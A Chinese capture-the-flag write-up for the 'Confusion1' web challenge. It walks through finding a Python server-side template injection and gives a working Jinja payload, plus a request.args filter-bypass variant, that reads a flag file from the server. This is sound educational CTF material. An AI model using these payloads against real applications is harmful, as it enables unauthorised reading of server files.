WEB:Confusion1

背景知识

SSTI漏洞

题目

根据网站图片和题目描述的提示,大象是php,蟒蛇是python,说明了这个网站是用python写的

在python中,比较常规的漏洞就是SSTI模板注入

没有思路,先点login和register页面看看

查看源代码

之前猜测是ssti漏洞,先验证

ssti常用注入

复制代码
__class__() 返回对象的类
__base__()/__mro__() 返回类所继承的基类
__subclasses__() 返回继承类的所有子类

测试payload

复制代码
{{"".__class__.__mro__[2].__subclasses__()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt").read()}}

被过滤了

替换payload为

复制代码
{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?&a=__class__&b=__mro__&c=__subclasses__&d=read

得到flag

参考学习链接:
【愚公系列】2023年05月 攻防世界-Web(Confusion1)_confusion1攻防世界_愚公搬代码的博客-CSDN博客 【攻防世界WEB】难度四星12分进阶题:Confusion1_wx617e2c956ef44的技术博客_51CTO博客

相关推荐
厦门辰迈智慧科技有限公司20 分钟前
排水管网实时监测筑牢城市安全防线
网络·物联网·安全·自动化·监测
fatsheep洋5 小时前
cacti的RCE
web安全·安全性测试
hjh198297 小时前
复现cacti的RCE
网络·安全·php
一口一个橘子7 小时前
[ctfshow web入门]web99 in_array的弱比较漏洞
web安全·网络安全·php
Sh3r10ck7 小时前
【Hack The Box】Code Write Up
安全
波吉爱睡觉8 小时前
Redis反弹Shell
redis·web安全·网络安全
wha the fuck4049 小时前
攻防世界-引导-Web_php_unserialize
安全·web安全·网络安全·php
小田冲冲冲9 小时前
命令执行漏洞
安全
德迅云安全杨德俊11 小时前
应用加速游戏盾的安全作用
网络·安全·游戏·ddos
跨境卫士情报站12 小时前
亚马逊地址关联暴雷:新算法下的账号安全保卫战
安全·亚马逊跨境电商